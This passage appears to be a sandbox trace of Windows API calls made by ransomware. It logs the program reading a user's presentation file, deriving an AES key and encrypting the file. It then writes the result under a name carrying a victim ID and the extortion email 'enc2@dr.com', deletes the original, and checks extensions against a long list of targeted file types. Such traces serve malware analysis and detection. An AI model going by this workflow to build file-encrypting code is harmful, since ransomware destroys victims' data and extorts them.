.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.093] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.094] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.094] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.097] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x235d, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x235d, lpOverlapped=0x0) returned 1
	[0186.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.100] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0186.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.102] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.103] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.103] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0186.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.103] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x235d, dwBufLen=0x235d | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x2360) returned 1
	[0186.103] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.106] RtlMoveMemory (in: Destination=0xfdf4e8, Source=0xfdd180, Length=0x235d | out: Destination=0xfdf4e8) 
	[0186.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.106] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf4e8*, pdwDataLen=0x18bc0c*=0x235d, dwBufLen=0x2360 | out: pbData=0xfdf4e8*, pdwDataLen=0x18bc0c*=0x2360) returned 1
	[0186.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.106] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0186.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.106] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.107] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0186.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.107] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.108] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.109] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0186.109] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.109] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdf4e8*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdf4e8*, lpNumberOfBytesWritten=0x18c068*=0x2360, lpOverlapped=0x0) returned 1
	[0186.113] CloseHandle (hObject=0x2c0) returned 1
	[0186.113] CloseHandle (hObject=0x384) returned 1
	[0186.113] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx")) returned 1
	[0186.116] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oqppyb09odsqs8rb6b.pptx")) returned 0
	[0186.116] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x839084fb, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x839084fb, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1
	[0186.117] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3af72c0, ftCreationTime.dwHighDateTime=0x1d96832, ftLastAccessTime.dwLowDateTime=0xba5e38c0, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xba5e38c0, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x3560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pacjpUC.ods", cAlternateFileName="")) returned 1
	[0186.117] lstrcmpW (lpString1="pacjpUC.ods", lpString2="..") returned 1
	[0186.117] lstrcmpW (lpString1="pacjpUC.ods", lpString2=".") returned 1
	[0186.117] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.117] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="pacjpUC.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\pacjpUC.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\pacjpUC.ods"
	[0186.117] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\pacjpUC.ods") returned 43
	[0186.117] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.117] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\pacjpUC.ods", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods") returned 0x2b
	[0186.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.118] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.118] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods") returned="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods"
	[0186.118] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\pacjpuc.ods") returned 43
	[0186.118] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.118] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.118] StrStrW (lpFirst=".ods", lpSrch=".") returned=".ods"
	[0186.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.119] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ods") returned=".ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.